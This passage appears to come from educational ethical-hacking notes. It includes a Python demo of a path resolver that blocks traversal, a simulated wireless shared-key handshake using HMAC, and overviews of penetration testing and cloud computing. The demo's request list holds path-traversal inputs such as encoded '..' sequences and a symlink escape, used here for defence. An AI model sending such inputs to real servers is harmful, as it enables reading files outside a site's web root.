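        # Symlink inside the root that points outside it (skipped where symlinks are unavailable)
        os.symlink(base / "secret.txt", root / "link-to-secret")
    except (OSError, NotImplementedError):
        pass
    return root


# Constructed requests: two legitimate, the rest attempts to leave the root
REQUESTS = [
    "/index.html",
    "/docs/../index.html",
    "/../secret.txt",
    "/%2e%2e/secret.txt",
    "/docs/../../secret.txt",
    "/link-to-secret",
]


def run_demo():
    root = build_demo_root()
    return {req: resolve_request(root, req) for req in REQUESTS}


if __name__ == "__main__":
    for req, verdict in run_demo().items():
        print(f"{req:28} -> {verdict}")
```

The check is on the resolved path rather than on the presence of ".." in the string, so encoded, doubled or symlink-assisted variants all fall to the same single rule: the final location must be inside the root.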
17. HACKING WIRELESS NETWORKS:
Access Point: The point where mobile devices and computers connect to the wireless
network.
SSID: The Service Set Identifier identifies the access point; it is human-readable text which,
when broadcast, leads to the identification of an access point.
Fig: 17.1
Authentication:
Open Authentication:
Fig: 17.2
When a client wants to connect to an open access point it sends a probe request, and the
AP sends a probe response; the client then sends an authentication request. Upon receiving a
response, the client establishes an association with the AP.
Shared Key Authentication Process:
Here, the client sends a probe request and the access point sends the probe response; then
the client sends an authentication request, and the AP sends an authentication challenge to
the client. The client must respond to the challenge using the shared key. The AP
then verifies the client and authenticates it, and the client establishes a connection with the
access point.
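An added Python example, not code from the report, that walks through the shared key exchange listed above with both sides' messages, and also illustrates the authentication property named under Cryptography (section 9): the access point issues a fresh random challenge, the client answers with an HMAC over it keyed with the shared key, and the AP verifies with a constant-time compare. The HMAC construction is an assumption for the demo: real 802.11 WEP shared-key authentication instead encrypted the challenge with RC4, which leaked keystream to anyone watching and is one reason WEP is retired. The SSID, key and client ids are constructed values.

```python
import hashlib
import hmac
import secrets

DEMO_SSID = "demo-net"
SHARED_KEY = b"constructed-demo-psk-do-not-reuse"   # constructed for this example only


class AccessPoint:
    """Authenticator side: holds the shared key and one outstanding challenge per client."""

    def __init__(self, ssid, key):
        self.ssid = ssid
        self.key = key
        self.pending = {}        # client_id -> challenge nonce
        self.associated = set()

    def probe_response(self):
        return {"ssid": self.ssid, "auth": "shared-key"}

    def auth_challenge(self, client_id):
        nonce = secrets.token_bytes(16)      # fresh per attempt, so an old answer is useless
        self.pending[client_id] = nonce
        return nonce

    def auth_verify(self, client_id, response):
        nonce = self.pending.pop(client_id, None)   # single use: consumed whether or not it matches
        if nonce is None:
            return False
        expected = hmac.new(self.key, nonce, hashlib.sha256).digest()
        ok = hmac.compare_digest(expected, response)   # constant-time compare
        if ok:
            self.associated.add(client_id)
        return ok


class Client:
    def __init__(self, client_id, key):
        self.client_id = client_id
        self.key = key

    def answer(self, nonce):
        # Proves possession of the key without ever putting the key on the air
        return hmac.new(self.key, nonce, hashlib.sha256).digest()


def shared_key_exchange(ap, client):
    """Run the exchange the report lists: probe, auth request, challenge, response, verify.
    Returns (associated?, transcript); the transcript is everything an eavesdropper sees."""
    transcript = []
    transcript.append(("client->ap", "probe request"))
    transcript.append(("ap->client", "probe response", ap.probe_response()))
    transcript.append(("client->ap", "authentication request", client.client_id))
    nonce = ap.auth_challenge(client.client_id)
    transcript.append(("ap->client", "authentication challenge", nonce.hex()))
    response = client.answer(nonce)
    transcript.append(("client->ap", "challenge response", response.hex()))
    ok = ap.auth_verify(client.client_id, response)
    transcript.append(("ap->client", "authentication result", "success" if ok else "failure"))
    return ok, transcript


def replay_attempt(ap, transcript, impostor_id):
    """Replaying a captured response against a fresh challenge fails: the nonce differs."""
    captured = bytes.fromhex(next(t[2] for t in transcript if t[1] == "challenge response"))
    ap.auth_challenge(impostor_id)
    return ap.auth_verify(impostor_id, captured)


if __name__ == "__main__":
    ap = AccessPoint(DEMO_SSID, SHARED_KEY)
    ok, transcript = shared_key_exchange(ap, Client("aa:bb:cc:00:00:01", SHARED_KEY))
    for step in transcript:
        print(step)
    print("associated:", ok, "| replay works:", replay_attempt(ap, transcript, "aa:bb:cc:00:00:03"))
```

The transcript is the attacker's view of the exchange: the challenge and the response are visible, but without the key neither can be turned into a valid answer to the next challenge.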
Fig: 17.3
Centralised Authentication:
Fig: 17.4
Fig: 18.1
19. PENETRATION TESTING:
Penetration testing is aimed at finding vulnerabilities, malicious content, flaws, and risks.
This is done to strengthen the organization's security system to defend the IT infrastructure.
Penetration testing is an official procedure that can be deemed helpful and not a harmful
attempt. It forms part of an ethical hacking process where it specifically focuses only on
penetrating the information system. Since it is helpful in improving cybersecurity strategies,
penetration testing should be performed regularly. Malicious content built to discover weak
points in applications, systems or programs keeps emerging and spreading in the
network. A regular pentest may not sort out all security concerns, but it significantly
minimizes the probability of a successful attack.
20. CLOUD COMPUTING:
Cloud computing takes all the heavy lifting involved in crunching and processing data away
from the device you carry around or sit and work at. It also moves all of that work to huge
computer clusters far away in cyberspace. The Internet becomes the cloud, and voilà, your
data, work, and applications are available from any device with which you can connect to the
Internet, anywhere in the world.
Cloud computing can be both public and private. Public cloud services provide their services
over the Internet for a fee. Private cloud services, on the other hand, only provide services to
a certain number of people. These services are a system of networks that supply hosted
services. There is also a hybrid option, which combines elements of both the public and
private services.
Email
Storage, backup, and data retrieval
Creating and testing apps
Analyzing data
Audio and video streaming
Delivering software on demand
Cloud computing is still a fairly new service but is being used by a number of different
organizations from big corporations to small businesses, nonprofits to government agencies,
and even individual consumers.
Deployment Models
There are various types of clouds, each of which is different from the other. Public clouds
provide their services on servers and storage on the Internet. These are operated by third-
party companies, who handle and control all the hardware, software, and the general
infrastructure. Clients access services through accounts that can be accessed by just about
anyone.
Private clouds are reserved for specific clientele, usually one business or organization. The
firm's data service center may host the cloud computing service. Many private cloud
computing services are provided on a private network.
Hybrid clouds are, as the name implies, a combination of both public and private services.
This type of model allows the user more flexibility and helps optimize the user's
infrastructure and security.
Types of Cloud Computing
Cloud computing is not a single piece of technology like a microchip or a cellphone. Rather,
it's a system primarily comprised of three services: software-as-a-service (SaaS),
infrastructure-as-a-service (IaaS), and platform-as-a-service (PaaS).
The cloud structure allows individuals to save storage space on their desktops or laptops. It
also lets users upgrade software more quickly because software companies can offer their
products via the web rather than through more traditional, tangible methods involving discs
or flash drives. For example, Adobe customers can access applications in its Creative Cloud
through an Internet-based subscription. This allows users to download new versions and fixes
to their programs easily.
Security has always been a big concern with the cloud especially when it comes to sensitive
medical records and financial information. While regulations force cloud computing services
to shore up their security and compliance measures, it remains an ongoing issue. Encryption
protects vital information, but if that encryption key is lost, the data disappears.
Servers maintained by cloud computing companies may fall victim to natural disasters,
internal bugs, and power outages, too. The geographical reach of cloud computing cuts both
ways: A blackout in California could paralyze users in New York, and a firm in Texas could
lose its data if something causes its Maine-based provider to crash.
As with any technology, there is a learning curve for both employees and managers. But with
many individuals accessing and manipulating information through a single portal, inadvertent
mistakes can transfer across an entire system.